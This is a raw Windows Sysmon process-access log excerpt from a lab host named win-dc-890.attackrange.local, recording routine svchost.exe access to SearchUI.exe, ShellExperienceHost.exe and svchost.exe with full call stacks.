07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 